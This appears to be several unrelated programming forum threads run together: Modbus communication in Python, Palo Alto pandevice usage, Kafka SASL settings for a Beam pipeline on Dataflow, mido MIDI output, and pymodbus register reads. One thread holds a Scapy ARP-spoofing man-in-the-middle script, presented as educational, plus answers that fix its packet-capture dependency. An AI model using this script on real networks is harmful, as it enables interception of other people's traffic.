I'm currently trying to develop an application that uses the Modbus-RTU protocol, and I have to use modbus_tk in Python 2.7.
I'm supposed to reuse bits of code from another application that is able to communicate with the micro-controller via Modbus. The code below works in that app, but I get an error when I run the same lines in my app.
import modbus_tk
import modbus_tk.defines as cst
import modbus_tk.modbus_rtu as modbus_rtu
import serial

MB_Add_Status = 8 + 5001

def MB_GetStatus(MB_Master_handle):
    try:
        status = MB_Master_handle.execute(1, cst.READ_HOLDING_REGISTERS, MB_Add_Status, 1)
        return status
    except modbus_tk.modbus.ModbusError, e:
        logger.error("%s- Code=%d" % (e, e.get_exception_code()))

MB_port = 3
masterMB = modbus_rtu.RtuMaster(serial.Serial(port='COM'+str(MB_port), baudrate=19200, bytesize=8, parity='N', stopbits=2, xonxoff=0))
status = MB_GetStatus(masterMB)
First I needed to delete the arguments baudrate, bytesize, etc. in the constructor call, because it raised an error like:
TypeError: __init__() got an unexpected keyword argument 'stopbits'
But then, when the call to execute is reached, there is another error, which I haven't been able to solve yet:
modbus_tk.modbus.ModbusInvalidResponseError: Response length is invalid 0
The only documentation I found is https://github.com/Nobatek/modbus-tk/tree/master/docs, but I couldn't understand much of it. If someone could first explain to me what this error really means and where I should look, that would be highly appreciated. Thank you very much!
The right repository for this library is https://github.com/ljean/modbus-tk
It requires PySerial 2.7
Found it!
I updated the library and set the parameters of the constructor correctly. This works fine now.
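For anyone landing here later, a minimal sketch of this kind of setup (assuming the ljean/modbus-tk version with PySerial 2.7; the set_timeout/set_verbose calls are optional debugging aids, not required):

import serial
import modbus_tk.defines as cst
import modbus_tk.modbus_rtu as modbus_rtu

MB_port = 3
MB_Add_Status = 8 + 5001

# The serial parameters go to pyserial; modbus_tk only wraps the open port.
master = modbus_rtu.RtuMaster(
    serial.Serial(port='COM' + str(MB_port), baudrate=19200, bytesize=8,
                  parity='N', stopbits=2, xonxoff=0)
)
master.set_timeout(1.0)   # give the slave time to answer before "invalid response"
master.set_verbose(True)  # log the raw frames while debugging

status = master.execute(1, cst.READ_HOLDING_REGISTERS, MB_Add_Status, 1)
print status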
I'm trying to understand how to read the following documentation:
https://pandevice.readthedocs.io/en/latest/readme.html
This is something I need to learn how to do, but I'm having difficulty with even simple tasks. Some I can get to work correctly; some I just can't see how to get working.
For example, if I were to add an interface and IP address:
from panos import device, firewall, network
fw_ip = "1.2.3.4"
api_username = "admin"
api_password = "pass123!"
#connect to firewall
fw = firewall.Firewall(fw_ip, api_username=api_username, api_password=api_password)
#create interface
interface = network.EthernetInterface(name="ethernet1/5", mode="layer3", ip="192.168.0.1/24")
fw.add(interface)
interface.create()
That is straightforward. But I can't for the life of me figure out how to replace/remove/delete/change any elements in an interface. I KNOW this is a matter of me not understanding the documentation. Here's my attempt thus far:
interface = network.EthernetInterface(name='ethernet1/5')
fw.delete(interface)
interface.create()
but I get the following error:
TypeError: delete() takes 1 positional argument but 2 were given
The other methods the documentation points out are remove() and delete(), but neither works.
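Judging from that TypeError, it looks like delete() doesn't take the interface as an argument at all. My untested guess at the intended pattern would be to attach the object to the firewall's config tree first and then call delete() on the object itself:

# Untested guess: build the object, attach it to the firewall tree,
# then call delete() with no arguments.
interface = network.EthernetInterface(name='ethernet1/5')
fw.add(interface)
interface.delete()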
I have a feeling this will be an easy one for someone who reads these often.
Thanks.
I've made a simple pipeline in Python to read from Kafka. The thing is that the Kafka cluster is on Confluent Cloud and I am having some trouble connecting to it.
I'm getting the following log on the Dataflow job:
Caused by: org.apache.kafka.common.KafkaException: Failed to construct kafka consumer
at org.apache.kafka.clients.consumer.KafkaConsumer.<init>(KafkaConsumer.java:820)
at org.apache.kafka.clients.consumer.KafkaConsumer.<init>(KafkaConsumer.java:631)
at org.apache.kafka.clients.consumer.KafkaConsumer.<init>(KafkaConsumer.java:612)
at org.apache.beam.sdk.io.kafka.KafkaIO$Read$GenerateKafkaSourceDescriptor.processElement(KafkaIO.java:1495)
Caused by: java.lang.IllegalArgumentException: Could not find a 'KafkaClient' entry in the JAAS configuration. System property 'java.security.auth.login.config' is not set
So I think I'm missing something while passing the config, since the error mentions something related to it. I'm really new to all of this and I know nothing about Java, so I don't know how to proceed, even after reading the JAAS documentation.
The code of the pipeline is the following:
import apache_beam as beam
from apache_beam.io.kafka import ReadFromKafka
from apache_beam.options.pipeline_options import PipelineOptions
import os
import json
import logging

os.environ['GOOGLE_APPLICATION_CREDENTIALS'] = 'credentialsOld.json'

with open('cluster.configuration.json') as cluster:
    data = json.load(cluster)
    cluster.close()  # redundant; the with block already closes the file

def logger(element):
    logging.info('Something was found')  # logging.INFO is a level constant, not a function

def main():
    config = {
        "bootstrap.servers": data["bootstrap.servers"],
        "security.protocol": data["security.protocol"],
        "sasl.mechanisms": data["sasl.mechanisms"],
        "sasl.username": data["sasl.username"],
        "sasl.password": data["sasl.password"],
        "session.timeout.ms": data["session.timeout.ms"],
        "auto.offset.reset": "earliest"
    }
    print('======================================================')

    beam_options = PipelineOptions(
        runner='DataflowRunner',
        project='project',
        experiments=['use_runner_v2'],
        streaming=True,
        save_main_session=True,
        job_name='kafka-stream-test'
    )

    with beam.Pipeline(options=beam_options) as p:
        msgs = p | 'ReadKafka' >> ReadFromKafka(
            consumer_config=config,
            topics=['users'],
            expansion_service="localhost:8088"
        )
        msgs | beam.FlatMap(logger)

if __name__ == '__main__':
    main()
I read something about passing a java.security.auth.login.config property in the config dictionary, but since that example is in Java and I'm using Python, I'm really lost as to what I have to pass, or even whether that's the property I have to pass.
By the way, I'm getting the API key and secret from here, and that is what I am passing to sasl.username and sasl.password.
I faced the same error the first time I tried Beam's expansion service. The key sasl.mechanisms that you are supplying is incorrect; try sasl.mechanism instead. You also do not need to supply the username and password separately, since the connection is authenticated through JAAS. Basically, a consumer_config like the one below worked for me:
config = {
    "bootstrap.servers": data["bootstrap.servers"],
    "security.protocol": data["security.protocol"],
    "sasl.mechanism": data["sasl.mechanisms"],
    "session.timeout.ms": data["session.timeout.ms"],
    "group.id": "tto",
    "sasl.jaas.config": f'org.apache.kafka.common.security.plain.PlainLoginModule required serviceName="Kafka" username=\"{data["sasl.username"]}\" password=\"{data["sasl.password"]}\";',
    "auto.offset.reset": "earliest"
}
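For context on why the keys change: ReadFromKafka hands this dictionary to the Java KafkaConsumer behind the expansion service (that is the class in the stack trace), so it expects the Java client's property names (sasl.mechanism, sasl.jaas.config) rather than the librdkafka-style ones (sasl.mechanisms, sasl.username, sasl.password) used by Confluent's Python client examples. A minimal sketch with hypothetical placeholder values, not taken from the question:

# Hypothetical placeholder values; substitute your own Confluent Cloud settings.
api_key = "YOUR_API_KEY"
api_secret = "YOUR_API_SECRET"

consumer_config = {
    "bootstrap.servers": "your-cluster.confluent.cloud:9092",  # placeholder
    "security.protocol": "SASL_SSL",
    "sasl.mechanism": "PLAIN",
    # The JAAS entry replaces sasl.username / sasl.password for the Java client.
    "sasl.jaas.config": (
        'org.apache.kafka.common.security.plain.PlainLoginModule required '
        'username="%s" password="%s";' % (api_key, api_secret)
    ),
    "group.id": "tto",
    "auto.offset.reset": "earliest",
}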
I got a partial answer to this question: I fixed this problem but ran into another one:
config = {
    "bootstrap.servers": data["bootstrap.servers"],
    "security.protocol": data["security.protocol"],
    "sasl.mechanisms": data["sasl.mechanisms"],
    "sasl.username": data["sasl.username"],
    "sasl.password": data["sasl.password"],
    "session.timeout.ms": data["session.timeout.ms"],
    "group.id": "tto",
    "sasl.jaas.config": f'org.apache.kafka.common.security.plain.PlainLoginModule required serviceName="Kafka" username=\"{data["sasl.username"]}\" password=\"{data["sasl.password"]}\";',
    "auto.offset.reset": "earliest"
}
I needed to provide the sasl.jaas.config property with the API key and secret of my cluster, and also the service name. However, now I'm facing a different error when running the pipeline on Dataflow:
Caused by: org.apache.kafka.common.errors.TimeoutException: Timeout expired while fetching topic metadata
This error shows up after 4-5 minutes of trying to run the job on Dataflow. I actually have no idea how to fix this, but I think it is related to my broker on Confluent rejecting the connection; it could be related to the execution zone, since the cluster is in a different zone than the job region.
UPDATE:
I tested the code on Linux/Ubuntu and, I don't know why, the expansion service gets downloaded automatically, so you won't get the unsupported signal error. I'm still having some issues trying to authenticate to Confluent Kafka, though.
I am using Scapy for a simple MITM attack script (I am using it for educational purposes only, of course), and I got this strange error which says: WARNING: No libpcap provider available ! pcap won't be used. I tried looking this error up online, but no one really answered it. What does this error mean? Is it possible that I am just not using the script correctly? Any help would be appreciated.
Here is my script:
import scapy.all as scapy

def get_target_mac(ip):
    arp_request = scapy.ARP(pdst=ip)
    broadcast = scapy.Ether(dst='ff:ff:ff:ff:ff:ff')
    finalpacket = broadcast/arp_request
    answer = scapy.srp(finalpacket, timeout=2, verbose=False)[0]
    mac = answer[0][1].hwsrc
    return(mac)

def restore(destination_ip, source_ip):
    target_mac = get_target_mac(destination_ip)
    source_mac = get_target_mac(source_ip)
    packet = scapy.ARP(op=2, pdst=destination_ip, hwdst=target_mac, pscr=source_ip, hwsrc=source_mac)
    scapy.sendp(packet, verbose=False)

def spoof_arp(target_ip, spoofed_ip):
    mac = get_target_mac(target_ip)
    packet = scapy.ARP(op=2, hwdst=target_ip, psrc=spoofed_ip)
    scapy.sendp(packet, verbose=False)

def main():
    try:
        while True:
            spoof_arp('router_ip', 'fake_ip')  # I hid the real IP
            spoof_arp('fake_ip', 'router_ip')
    except KeyboardInterrupt:
        restore('router_ip', 'fake_ip')
        restore('fake_ip', 'router_ip')
        exit(0)
I think that user16139739 gave a possible solution. I ran into several problems with Scapy, this being one of them; the stable release has some known bugs which were corrected in the development version.
I did not install anything else. In my case, perhaps I had already applied user16139739's solution before, but I still got this error at some point, and another one with RawPcapReader, so I used the development version.
libpcap is a library for Unix; on Windows you need an alternative such as Npcap, or the older Windows counterpart, WinPcap.
I was able to remedy the problem by installing Nmap on Windows 10, whose installer bundles Npcap (the packet capture library Scapy needs there).
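If it helps to verify the fix, Scapy exposes a conf.use_pcap flag; a quick hedged check (behaviour can differ between Scapy versions and platforms):

# After installing Npcap/WinPcap, check whether Scapy picked up a pcap provider.
from scapy.all import conf

print(conf.use_pcap)  # expected to be True on Windows once a provider is found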
My code:
import mido
import time
mido.set_backend('mido.backends.pygame')
output = mido.open_output()
output.send(mido.Message('note_on', note=64, velocity=60))
time.sleep(3)
output.close()
After the last line, the following error is printed:
Exception Exception: "PortMidi: `Bad pointer'" in <pypm.Output object at 0x025FF0B0> ignored
Apart from that, everything seems to work fine. However, I'm developing a console app and this output is annoying. How can I get rid of this error?
I am using Windows 7 and Python 2.7.
You don't even have to set a backend, as RtMidi is the default; see the mido backend documentation.
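In other words, a minimal sketch of the same test without the set_backend() call (this assumes the python-rtmidi package is installed; with the RtMidi backend, PortMidi is never loaded, so its cleanup message cannot appear):

import time
import mido

# No set_backend() call: mido falls back to its default RtMidi backend.
output = mido.open_output()
output.send(mido.Message('note_on', note=64, velocity=60))
time.sleep(3)
output.close()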
I'm trying to read Modbus registers from a PLC using pymodbus. I am following the example posted here. When I attempt to print response.registers I get the following error: object has no attribute 'registers'
The example doesn't show the modules being imported, but it seems to be the accepted answer. I think the error may be that I'm importing the wrong module or that I am missing one. I am simply trying to read a register.
Here is my code:
from pymodbus.client.sync import ModbusTcpClient
c = ModbusTcpClient(host="192.168.1.20")
chk = c.read_holding_registers(257,10, unit = 1)
response = c.execute(chk)
print response.registers
From reading the pymodbus code, it appears that executing the read_holding_registers request will return either a response object or an ExceptionResponse object that contains an error. I would guess you're receiving the latter. You need to try something like this:
from pymodbus.register_read_message import ReadHoldingRegistersResponse
#...
response = c.execute(chk)
if isinstance(response, ReadHoldingRegistersResponse):
    print response.registers
else:
    pass  # handle error condition here
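As a variation on the same idea, a hedged sketch that skips the explicit execute() call; in the pymodbus versions I've seen, read_holding_registers() already sends the request and returns the response, which you can then type-check the same way:

from pymodbus.client.sync import ModbusTcpClient
from pymodbus.register_read_message import ReadHoldingRegistersResponse

c = ModbusTcpClient(host="192.168.1.20")
result = c.read_holding_registers(257, 10, unit=1)

if isinstance(result, ReadHoldingRegistersResponse):
    print result.registers
else:
    print result  # likely an ExceptionResponse describing the Modbus error

c.close()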